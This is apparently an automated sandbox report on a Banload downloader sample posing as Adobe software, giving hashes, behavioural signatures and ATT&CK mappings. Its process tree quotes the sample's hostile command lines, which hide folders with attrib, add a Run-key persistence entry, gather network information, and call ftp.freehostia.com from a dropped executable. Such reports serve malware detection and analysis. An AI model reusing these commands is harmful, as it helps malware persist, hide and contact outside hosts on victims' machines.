Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
10s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
12/05/2024, 07:13
Static task
static1
Behavioral task
behavioral1
Sample
38e3b021f5cac0bc19bcdd76f6228771_JaffaCakes118.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
38e3b021f5cac0bc19bcdd76f6228771_JaffaCakes118.exe
Resource
win10v2004-20240508-en
Errors
General
-
Target
38e3b021f5cac0bc19bcdd76f6228771_JaffaCakes118.exe
-
Size
4.3MB
-
MD5
38e3b021f5cac0bc19bcdd76f6228771
-
SHA1
a6f23a56b70ef3ed327277bfec5eaf37d1505d89
-
SHA256
61540809d55eaa23ba0ac82ff4b530823c93fbc8e7097ccaeb8329e0eb1e48c1
-
SHA512
cd9504a0b317b9efac96999ee3cd6c4869c97d222149216506c971c2de5144f03969885cbd925797f5fe687d10dcf86abfed7581515131b7051ab0e8b521f222
-
SSDEEP
98304:YkeMI+e05/Nm5OJumFPtQAcLFNKJ4LowZkh52h0mPtQAYTTN/:e0FNcmdEBNq4Loek7MQvN/
Malware Config
Signatures
-
Banload
Banload variants download malicious files, then install and execute the files.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ adbr01.exe -
Sets file to hidden 1 TTPs 6 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 1812 attrib.exe 2464 attrib.exe 856 attrib.exe 2064 attrib.exe 1404 attrib.exe 4532 attrib.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion adbr01.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate adbr01.exe -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation 38e3b021f5cac0bc19bcdd76f6228771_JaffaCakes118.exe Key value queried \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation WScript.exe -
Executes dropped EXE 3 IoCs
pid Process 2624 Adobeta.exe 1112 adbr01.exe 1628 adbr01.exe -
resource yara_rule behavioral2/files/0x00070000000233d6-16.dat upx behavioral2/files/0x00070000000233d5-15.dat upx behavioral2/files/0x00070000000233d7-21.dat upx behavioral2/memory/2624-40-0x0000000000400000-0x0000000000446000-memory.dmp upx behavioral2/memory/2624-43-0x0000000000400000-0x0000000000446000-memory.dmp upx behavioral2/memory/1112-48-0x0000000000400000-0x00000000006E8000-memory.dmp upx behavioral2/memory/1628-52-0x0000000000400000-0x00000000006E8000-memory.dmp upx behavioral2/memory/1628-62-0x0000000000400000-0x00000000006E8000-memory.dmp upx behavioral2/memory/1628-63-0x0000000000400000-0x00000000006E8000-memory.dmp upx behavioral2/memory/1628-64-0x0000000000400000-0x00000000006E8000-memory.dmp upx behavioral2/memory/1112-75-0x0000000000400000-0x00000000006E8000-memory.dmp upx -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sococsoE = "C:\\Users\\Admin\\AppData\\Roaming\\Adobe\\Adobe Inc\\AdobeRead\\aijw01.bat" reg.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
pid Process 3044 ipconfig.exe -
Modifies registry class 7 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{71E816AE-B6E7-34BA-0341-332B111F53E6}\InprocServer32 adbr01.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{71E816AE-B6E7-34BA-0341-332B111F53E6}\InprocServer32\ = "%systemroot%\\SysWow64\\eapsimextdesktop.dll" adbr01.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{71E816AE-B6E7-34BA-0341-332B111F53E6}\InprocServer32\ThreadingModel = "Apartment" adbr01.exe Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings 38e3b021f5cac0bc19bcdd76f6228771_JaffaCakes118.exe Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{71E816AE-B6E7-34BA-0341-332B111F53E6} adbr01.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{71E816AE-B6E7-34BA-0341-332B111F53E6}\ = "EAPSIM Identity Task class" adbr01.exe -
Suspicious use of WriteProcessMemory 50 IoCs
description pid Process procid_target PID 1368 wrote to memory of 4760 1368 38e3b021f5cac0bc19bcdd76f6228771_JaffaCakes118.exe 81 PID 1368 wrote to memory of 4760 1368 38e3b021f5cac0bc19bcdd76f6228771_JaffaCakes118.exe 81 PID 1368 wrote to memory of 4760 1368 38e3b021f5cac0bc19bcdd76f6228771_JaffaCakes118.exe 81 PID 4760 wrote to memory of 4488 4760 WScript.exe 82 PID 4760 wrote to memory of 4488 4760 WScript.exe 82 PID 4760 wrote to memory of 4488 4760 WScript.exe 82 PID 4488 wrote to memory of 3692 4488 cmd.exe 84 PID 4488 wrote to memory of 3692 4488 cmd.exe 84 PID 4488 wrote to memory of 3692 4488 cmd.exe 84 PID 4488 wrote to memory of 4532 4488 cmd.exe 85 PID 4488 wrote to memory of 4532 4488 cmd.exe 85 PID 4488 wrote to memory of 4532 4488 cmd.exe 85 PID 4488 wrote to memory of 1812 4488 cmd.exe 86 PID 4488 wrote to memory of 1812 4488 cmd.exe 86 PID 4488 wrote to memory of 1812 4488 cmd.exe 86 PID 4488 wrote to memory of 2464 4488 cmd.exe 87 PID 4488 wrote to memory of 2464 4488 cmd.exe 87 PID 4488 wrote to memory of 2464 4488 cmd.exe 87 PID 4488 wrote to memory of 1404 4488 cmd.exe 88 PID 4488 wrote to memory of 1404 4488 cmd.exe 88 PID 4488 wrote to memory of 1404 4488 cmd.exe 88 PID 4488 wrote to memory of 856 4488 cmd.exe 89 PID 4488 wrote to memory of 856 4488 cmd.exe 89 PID 4488 wrote to memory of 856 4488 cmd.exe 89 PID 4488 wrote to memory of 2064 4488 cmd.exe 90 PID 4488 wrote to memory of 2064 4488 cmd.exe 90 PID 4488 wrote to memory of 2064 4488 cmd.exe 90 PID 4488 wrote to memory of 1616 4488 cmd.exe 91 PID 4488 wrote to memory of 1616 4488 cmd.exe 91 PID 4488 wrote to memory of 1616 4488 cmd.exe 91 PID 1616 wrote to memory of 4400 1616 WScript.exe 92 PID 1616 wrote to memory of 4400 1616 WScript.exe 92 PID 1616 wrote to memory of 4400 1616 WScript.exe 92 PID 4400 wrote to memory of 2624 4400 cmd.exe 94 PID 4400 wrote to memory of 2624 4400 cmd.exe 94 PID 4400 wrote to memory of 2624 4400 cmd.exe 94 PID 4400 wrote to memory of 4048 4400 cmd.exe 95 PID 4400 wrote to memory of 4048 4400 cmd.exe 95 PID 4400 wrote to memory of 4048 4400 cmd.exe 95 PID 4400 wrote to memory of 3044 4400 cmd.exe 96 PID 4400 wrote to memory of 3044 4400 cmd.exe 96 PID 4400 wrote to memory of 3044 4400 cmd.exe 96 PID 4400 wrote to memory of 1112 4400 cmd.exe 97 PID 4400 wrote to memory of 1112 4400 cmd.exe 97 PID 4400 wrote to memory of 1112 4400 cmd.exe 97 PID 1112 wrote to memory of 1628 1112 adbr01.exe 98 PID 1112 wrote to memory of 1628 1112 adbr01.exe 98 PID 1112 wrote to memory of 1628 1112 adbr01.exe 98 PID 1112 wrote to memory of 1628 1112 adbr01.exe 98 PID 1112 wrote to memory of 1628 1112 adbr01.exe 98 -
Views/modifies file attributes 1 TTPs 6 IoCs
pid Process 1812 attrib.exe 2464 attrib.exe 856 attrib.exe 2064 attrib.exe 1404 attrib.exe 4532 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\38e3b021f5cac0bc19bcdd76f6228771_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\38e3b021f5cac0bc19bcdd76f6228771_JaffaCakes118.exe"1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1368 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\ZREA.vbs"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4760 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\enikiol02.bat" /quiet /norestart"3⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4488 -
C:\Windows\SysWOW64\xcopy.exexcopy /y /h /e /r /k /c *.* "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\"4⤵
- Enumerates system info in registry
PID:3692
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead"4⤵
- Sets file to hidden
- Views/modifies file attributes
PID:4532
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe Reader\AdobeR"4⤵
- Sets file to hidden
- Views/modifies file attributes
PID:1812
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe Reader\ADBR\READER"4⤵
- Sets file to hidden
- Views/modifies file attributes
PID:2464
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER"4⤵
- Sets file to hidden
- Views/modifies file attributes
PID:1404
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\AdobeR"4⤵
- Sets file to hidden
- Views/modifies file attributes
PID:856
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\RAdobe\RADBR\AREADER"4⤵
- Sets file to hidden
- Views/modifies file attributes
PID:2064
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\nimiki09.vbs"4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1616 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Adobe\Adobe INC\AadobeRead\enikiol03.bat" /quiet /norestart"5⤵
- Suspicious use of WriteProcessMemory
PID:4400 -
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\Adobeta.exeAdobeta.exe -x -x -x -d -nuttyhdff -s:nuttyhdff.nuttyhdff ftp.freehostia.com -nuttyhdff6⤵
- Executes dropped EXE
PID:2624
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "sococsoE" /t REG_SZ /F /D "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\aijw01.bat"6⤵
- Adds Run key to start application
PID:4048
-
-
C:\Windows\SysWOW64\ipconfig.exeipconfig /all6⤵
- Gathers network information
PID:3044
-
-
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exeadbr01.exe -f "011.011"6⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1112 -
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exeadbr01.exe -f "011.011"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Modifies registry class
PID:1628
-
-
-
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr02.exeadbr02.exe -f "112.112"6⤵PID:1928
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Defense Evasion
Hide Artifacts
2Hidden Files and Directories
2Modify Registry
1Virtualization/Sandbox Evasion
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
106B
MD54b474101cde9031b36105bbc0856b8f2
SHA178120dbc9bf88dd21b9de6c3012ce55c0a88efce
SHA25668ce4767cbde30b24cb244bc56ee938a6de52780fab7012d6c8f859b56b7f0a9
SHA5125ec24355ec7646157904f874da91186fdca3618a6d0034d9454abd4660cba9356ebb4616a19e97ce4d614f25fd70816ea76e3d569ad7a1623330466247330edb
-
Filesize
108KB
MD5daeaadb1e509ee3568645b725c7e5029
SHA12a463493e707e19d6c3444665f696f1e846483d4
SHA25662d34d5206dfc434c5a5713181adbec88ae8dbbf8faa7809edf763dab939aca7
SHA512f74156acaec9b7822fce94eb8115115b40edbb0e4fcabfdf22f6d1bda1c75bc182fe4b874cc0170fbe9414b3e05f593d3c4b71aedece65142ad62e87d2567038
-
Filesize
127KB
MD512af68f7d332050c34bdd79fcc8970c7
SHA1e99d9858b9dd3f21b22035193c888280ea54030b
SHA2569e3ef05a090bf38988d826efcfafeeac97433745d580faf5e7d162f2fd464d10
SHA512a500004e2b4a4a477a2680b45d72dec8190220a6bcb560c4a758c49c31996b0f950ff98a5edd29ca7215cffa4012a5e384d70953d9efd9b0504d2f90763e7946
-
Filesize
519B
MD5bd641fd8a89df0d37d06e70c1190385b
SHA1519d3f83a3bb15e17e7c39241d7e88224a9088d5
SHA256d71a091be2133db33293d57919a38198dbcd62f14ac4362a9b5813ad118c6fe0
SHA512160c1a27f3897eee99333b9a561d803d8f607d8ec6b0fcb36e09332e4fc0af590d3a5d0ea9481e2da9b0376afca01675fb1a8d41b3b194d60614e7122567ea06
-
Filesize
2.1MB
MD50fa6655f07e9fb4530581ed792b5d9a5
SHA1cfb92afe0c03243d94ee1a6c0dd6437f644fb5a2
SHA25613e048a6e41796b9038a55e634d54d2976dfa781fdaa051d635e4303e034536a
SHA512b8be270621176e54cfc98cfaa5d06afedab96a41ec19ab3078b62d85c76faf1f33d449ff26762758f2ac7a78abd7fb1dfb8ee52f6eda310921c76bd5c696618e
-
Filesize
2.1MB
MD52bdedc125e74a995b2409d5155b9ea15
SHA151f1a7b99c6fa5cab61395ef5ce4b98c37648407
SHA256d36b2721aa9a44391ba00d3533906cc481e2e67fbc8169409631614b38171a0d
SHA51222fd2a64cba4efe97c9d661017cff3e4143017e7e0feb75e8c84cf180143616d9d5c6a746914c85e45c0d9e0d87b37d9b4663593e94e2238e8f4ad86e64e5998
-
Filesize
205B
MD54a7b39c1281e958c383f4500c3cceb42
SHA1d374728df66cbcf862ac1dee320c4347eeba3fd3
SHA25676a5096de7785bd0e16b2141ce23be096a0fdf687361a1b9cc7e2fc078693c07
SHA5123d64ae760fc89743c4c71f445239c2e10b58b829b79bc28fc66e7bcb6d5f0eed59d1ebce6497586648885f7c5e190caafff167c2e146228783bfae1f7b3f30e7
-
Filesize
923B
MD57b1fb7ccb83e2be074c8eb5afd7e3675
SHA189eefff900c60269078d12f5495c4838ccda62e0
SHA256742ef36cbe95b5528c13e001c5040b75bf6aef22299731864318095e87bc4cb4
SHA512a4be580f5c07c7e1d0171ffc2990cf1dd838ca77d7584a3d70bba62b2276bca899d4af22fd0a28dd284c7ec28b1223f551a0ad040cf89d92aa34aa2fb1196eb0
-
Filesize
1KB
MD5a0eda0c5e3684e57fcd2f68a298b1446
SHA139e10699ae54cff7bdc4887e54f44f0ac8ced2de
SHA256b063723077544ae58431e6d6d846e95164548180bc829d3d06bd0211a33d47e2
SHA5125bde11ed902768662bf0cdd3a9f96d7d7b3c0d67ced5b29e9aa15b1b52120be1762b279a1a8888f8ba866873c00949d1f08d586aa50224f30391ae9b5181f168
-
Filesize
548B
MD5211f29b36069c5d74bb2fc624e3b750e
SHA14dde779a3951aae084e147da8f7298d316bb5ab5
SHA256fd80fc307f7ddddb874a38d249d14fcc9fa0ea7add12c37cc49c4337df42eb8d
SHA512ea5fdef56c58a6afbb7f04a1cb5c24054175cf7eea87e636488d4861798b95d2e63378e18c3c5afa03231fab3a15fe674f4d1d4f017dffbe0bc8b4f7836d87be
-
Filesize
107B
MD5d18b3077b533ad3c357a5eb91b580fdf
SHA167a818c98c35dfc03a5218c4920241b1e8c57245
SHA2560996a6841a0d31a6e1051924d6dc3be6588f7297b8c23d6e08d6461c87f1d0ad
SHA5126f6e0acc83d13ebbff0e8cbde53e03704bb4b2da27a18222475a7c366e51ad9cb200e562ed18dc8fc8491af306509af16d4b2eab57fe784aaae16f9a0ed84db5